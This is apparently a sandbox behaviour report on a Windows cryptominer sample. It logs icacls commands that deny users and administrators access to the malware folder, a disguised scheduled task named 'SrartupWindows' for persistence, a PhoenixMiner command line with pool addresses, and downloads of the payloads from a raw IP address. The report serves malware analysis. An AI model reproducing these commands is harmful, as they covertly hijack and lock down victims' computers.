Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | March 9, 2021, 11:31 a.m. | March 9, 2021, 11:33 a.m. |
-
-
-
cmd.exe C:\Windows\system32\cmd.exe /c icacls C:\ProgramData\NetWork /deny "%username%:(R,REA,RA)"
1972-
icacls.exe icacls C:\ProgramData\NetWork /deny "test22:(R,REA,RA)"
2420
-
-
-
icacls.exe icacls C:\ProgramData\NetWork /deny "Users:(R,REA,RA)"
1812
-
-
cmd.exe C:\Windows\system32\cmd.exe /c icacls C:\ProgramData\NetWork /deny "Administrators:(R,REA,RA))"
2908-
icacls.exe icacls C:\ProgramData\NetWork /deny "Administrators:(R,REA,RA))"
1108
-
-
cmd.exe C:\Windows\system32\cmd.exe /cschtasks /create /tn "SrartupWindows" /tr "%ProgramData%\NetWork\This.exe" /sc minute /mo 10
2064-
schtasks.exe schtasks /create /tn "SrartupWindows" /tr "C:\ProgramData\NetWork\This.exe" /sc minute /mo 10
872
-
-
PhoenixMiner.exe "C:\ProgramData\NetWork\PhoenixMiner.exe" -pool stratum+tcp://eu.emcd.io:7777 -pool2 stratum+tcp://eu2.emcd.io:7777 -wal patriot.h -gpow 30 -gt 6 -log 0
2316
-
-
cmd.exe C:\Windows\system32\cmd.exe /c icacls C:\ProgramData\NetWork /deny "%username%:(R,REA,RA)"
2032-
icacls.exe icacls C:\ProgramData\NetWork /deny "test22:(R,REA,RA)"
1276
-
-
-
icacls.exe icacls C:\ProgramData\NetWork /deny "Users:(R,REA,RA)"
2724
-
-
cmd.exe C:\Windows\system32\cmd.exe /c icacls C:\ProgramData\NetWork /deny "Administrators:(R,REA,RA))"
2740-
icacls.exe icacls C:\ProgramData\NetWork /deny "Administrators:(R,REA,RA))"
2664
-
-
cmd.exe C:\Windows\system32\cmd.exe /cschtasks /create /tn "SrartupWindows" /tr "%ProgramData%\NetWork\This.exe" /sc minute /mo 10
2612-
schtasks.exe schtasks /create /tn "SrartupWindows" /tr "C:\ProgramData\NetWork\This.exe" /sc minute /mo 10
2620
-
-
PhoenixMiner.exe "C:\ProgramData\NetWork\PhoenixMiner.exe" -pool stratum+tcp://eu.emcd.io:7777 -pool2 stratum+tcp://eu2.emcd.io:7777 -wal patriot.h -gpow 30 -gt 6 -log 0
288
-
Suricata Alerts
Suricata TLS
No Suricata TLS
suspicious_features | Connection to IP address | suspicious_request | GET http://194.147.115.117/zzztop/PhoenixMiner.exe | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET http://194.147.115.117/zzztop/This.exe |
request | GET http://194.147.115.117/zzztop/PhoenixMiner.exe |
request | GET http://194.147.115.117/zzztop/This.exe |
file | C:\ProgramData\NetWork\PhoenixMiner.exe |
file | C:\ProgramData\NetWork\This.exe |
cmdline | C:\Windows\system32\cmd.exe /c icacls C:\ProgramData\NetWork /deny "%username%:(R,REA,RA)" |
cmdline | schtasks /create /tn "SrartupWindows" /tr "C:\ProgramData\NetWork\This.exe" /sc minute /mo 10 |
cmdline | C:\Windows\system32\cmd.exe /cschtasks /create /tn "SrartupWindows" /tr "%ProgramData%\NetWork\This.exe" /sc minute /mo 10 |
cmdline | C:\Windows\system32\cmd.exe /c icacls C:\ProgramData\NetWork /deny "Administrators:(R,REA,RA))" |
cmdline | C:\Windows\system32\cmd.exe /c icacls C:\ProgramData\NetWork /deny "Users:(R,REA,RA)" |
file | C:\ProgramData\NetWork\PhoenixMiner.exe |